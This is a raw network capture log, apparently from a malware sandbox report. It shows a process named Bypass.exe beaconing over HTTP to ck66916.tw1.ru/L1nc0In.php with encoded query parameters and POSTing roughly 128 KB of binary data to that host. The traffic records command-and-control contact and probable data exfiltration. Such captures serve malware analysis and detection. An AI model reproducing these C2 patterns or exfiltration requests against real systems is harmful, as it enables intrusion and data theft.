2dWdEZUJUeNBTREl0cWdkW2FTRJJ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:54:32.470726013 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:54:32 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.44975292.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:54:37.480432987 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:54:38.176522970 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:54:38 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.44975392.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:54:43.198962927 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:54:43.926820993 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:54:43 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.44975492.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:54:45.074774027 CEST785OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&1ee1ab9261adb8cfddd516f369c274e1=QX9JSUNJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjhzN1kDN5EDOkVTNiVzNwUWN4IWZmBTM1cTO3kjZwEjMzUjZkhjYjJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:54:45.786645889 CEST161INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:54:45 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 0
                        Connection: keep-alive
                        Jun 23, 2024 06:54:45.792171955 CEST579OUTPOST /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryCZvrRLBBKVwcdizJ
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                        Host: ck66916.tw1.ru
                        Content-Length: 127919
                        Expect: 100-continue
                        Jun 23, 2024 06:54:46.008459091 CEST25INHTTP/1.1 100 Continue
                        Jun 23, 2024 06:54:46.008867979 CEST13596OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 43 5a 76 72 52 4c 42 42 4b 56 77 63 64 69 7a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61
                        Data Ascii: ------------WebKitFormBoundaryCZvrRLBBKVwcdizJContent-Disposition: form-data; name="e7a5a92d3412b83d77ff1a5a60f15f1f"jVmMkRmN1ITNklzN5UmM3czY4Y2YlBzNkJTYzImY3gjY5YzYjBjYl1iN3Q2YkRjYxkDZilDNilzN0EmNlZzNkJGO5MjYjZWZ0ATYlZWMwYmN----------
                        Jun 23, 2024 06:54:46.013925076 CEST2472OUTData Raw: 65 6a 09 92 16 b6 d4 b6 dd 61 de 03 7c 16 b7 43 7d 8a 6c 9b 83 3d 05 e2 83 6e de 07 05 91 aa f8 9b 9a cd e0 d7 9b 9a 2b 1a 39 af 6a cf a1 fc 99 14 a5 df 84 33 f2 1b e3 7e 54 51 08 74 a5 0d 48 a0 1b 95 49 24 04 19 e0 d0 3d 16 eb 09 84 1e d9 e6 25
                        Data Ascii: eja|C}l=n+9j3~TQtHI$=%.V#[epGMgoKT}7SKE}V['.{adO^fQ;rPOFXxTE<Nb\riQeuF=S
                        Jun 23, 2024 06:54:46.013950109 CEST4944OUTData Raw: bd f0 09 06 b8 6f 32 36 bb 18 53 ef 3a a0 4d 8a b4 2f 3b 92 dc ae fd f3 e6 c9 83 e6 58 86 36 9f 15 62 a9 5a 54 51 47 6b 2c 70 76 08 bb e5 e9 20 f6 ad 4c 2c 75 61 6e eb 77 e8 f7 3b 0f b9 20 4e c8 72 f1 f2 13 3b 5f 8b ba ba 27 bb 66 e7 5f 88 14 cd
                        Data Ascii: o26S:M/;X6bZTQGk,pv L,uanw; Nr;_'f_{E1-(Oo!Qyq0~>YD)7g}B2`ascf'i4FJj4\}r6xhuHp{~L1:(-2)C%7,
                        Jun 23, 2024 06:54:46.013979912 CEST2472OUTData Raw: f6 20 c7 cb 6c b6 06 3b 66 1b 39 cc 0f bc da 84 f8 f9 4a b2 1a b4 a3 d3 65 60 86 69 7b 7f e2 59 ef c6 94 6b 61 2e 0b 26 17 43 35 ac dd fe 5c eb b1 37 f1 0b 31 c8 37 d6 72 fd a7 fd 86 8a 10 83 ec 24 11 d3 a8 eb e6 4c 9c f8 34 51 9e 8e d1 93 46 dc
                        Data Ascii: l;f9Je`i{Yka.&C5\717r$L4QFNi9q W0ttFHh`zb\9jvbGz!)\+j:`]:?J?jK}+$C%QZe)M90c4s<^3RJ
                        Jun 23, 2024 06:54:46.013999939 CEST4944OUTData Raw: e8 ec c4 f0 e8 14 b8 fd ab 52 c5 a6 c2 4f e2 18 91 74 9b 93 46 17 88 58 0e 88 8f cf 89 4d 6e 10 d3 27 c6 3a d2 1c 0f 17 28 7e 41 8b 18 3f f4 91 44 8c 49 8a 78 14 c4 98 b5 4c 1e 92 7e 78 04 e5 e5 76 2d 2c 1f 86 c1 1c 06 23 98 bf 36 1c f5 51 0d 26
                        Data Ascii: ROtFXMn':(~A?DIxL~xv-,#6Q&w}2lF#~?|zh<K@e*q]j@ v3hAK,5Jrzo94BR>K^`Z@dz`Vu>amgiQvH-{Sj)
                        Jun 23, 2024 06:54:46.014019012 CEST2472OUTData Raw: 24 f1 ff 04 42 d8 f8 d3 d3 81 94 54 9d 4c c1 41 a4 74 4b 72 8d d1 22 85 3e 08 d8 91 98 13 75 b0 58 3d 32 24 a9 10 48 f2 7e 39 47 4c b6 44 f0 75 92 bf bd b3 92 40 f1 4d cc a8 66 b1 8a ac e4 d3 9b 4f 46 67 b3 e4 9c 81 19 cc 43 a0 4d 77 52 48 b6 a5
                        Data Ascii: $BTLAtKr">uX=2$H~9GLDu@MfOFgCMwRHc'&;A5()e%"rPafwo#m[iSe$o=}eAj|y1+|jQB4eD*PC/p`k>dSZD7e2TO?
                        Jun 23, 2024 06:54:46.014058113 CEST2472OUTData Raw: 34 8e dd b1 e2 7c 38 de 2e 63 5e a7 09 0c 99 47 0a 5f b9 14 09 87 e8 e2 78 e5 e6 87 85 6f 17 5b 06 66 a5 d8 29 2f d0 95 6a 46 c6 27 ff cc 9a 36 7f d9 e4 6f dd 63 af b6 40 6b 3a 84 63 77 aa 7c a7 61 6f 1e 00 a7 9e 32 8c 63 9d fc c0 a9 61 13 55 d4
                        Data Ascii: 4|8.c^G_xo[f)/jF'6oc@k:cw|ao2caUc}gJ6b^)-KP{/Gp3'@},sn`}"'-&b(n/ <[l]2'&D=+fd.FL;CZuVj\mb=!h<9:ms-`\>E
                        Jun 23, 2024 06:54:46.014074087 CEST2472OUTData Raw: a8 f6 36 72 35 dd a4 9a 98 c8 27 7e 97 9b 95 43 70 0f ad 94 fd bd ed e4 6a 12 8d 74 dd 45 29 fc c7 d2 1e 3e 91 f9 44 fb a9 4c 72 a4 5c 6e 23 dd a9 b2 ac ef 0a ac aa c7 4e 53 c9 dd 33 4f 29 af e5 9c 4b dd 43 28 32 78 23 60 b8 e4 c7 e2 b2 60 e3 74
                        Data Ascii: 6r5'~CpjtE)>DLr\n#NS3O)KC(2x#``t7\piuR..rp$+pN`pfJ?%i|?I#^G^8%RYDy~9lZlr<$\jyvd1*"<{<n"9d<sf
                        Jun 23, 2024 06:54:46.014087915 CEST2472OUTData Raw: 46 78 4e 9c 8e 58 6a 5f e8 6b b8 02 5a a4 bb 4d 2c d5 00 4c cb 4d 82 d0 73 60 d3 e8 23 01 13 3b ba 4d 94 58 2d 01 d8 df 4c ee f8 a3 d7 c2 90 e2 a1 23 99 33 19 d5 84 8e 0f ed ea 49 8f 67 4c 1f 4b e0 53 d2 d3 7b b7 b3 08 05 2f 6a b3 e1 59 19 8b fb
                        Data Ascii: FxNXj_kZM,LMs`#;MX-L#3IgLKS{/jYJxPw}^oG#WN7:Br9Y,@Tn y9SP|kSvL<a0a;%Zq{Eg$}'wj*_Vl
                        Jun 23, 2024 06:54:46.018560886 CEST2472OUTData Raw: 57 56 96 be b4 aa 0e ca 39 19 08 9d 29 54 67 a6 6c 49 76 1c 67 f6 4b 93 a2 0f ca 51 43 e9 ea c7 b9 4b 3f 23 a5 0a bb 11 f3 fe 17 fa 45 fc ce 0b e3 ad 74 b6 cd 41 d9 b5 8f d0 6e f7 73 34 90 d0 1b 8f 95 7c d6 f3 c7 1e ea 2f 4c d8 a6 b3 3c 33 d6 72
                        Data Ascii: WV9)TglIvgKQCK?#EtAns4|/L<3rhe>l*PCg<;hi{/X\_.[5y)vrf^q{zx%5QFhGwe$U5uhw^ns|+nh^93n8ezg5K}CU
                        Jun 23, 2024 06:54:46.629122019 CEST161INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:54:46 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 0
                        Connection: keep-alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.44975592.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:54:48.949148893 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:54:49.637916088 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:54:49 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.2.44975692.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:54:54.652283907 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:54:55.365262032 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:54:55 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        10192.168.2.44975892.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:55:00.386689901 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:55:01.087023973 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:55:00 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        11192.168.2.44975992.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:55:06.105329037 CEST2223OUTGET 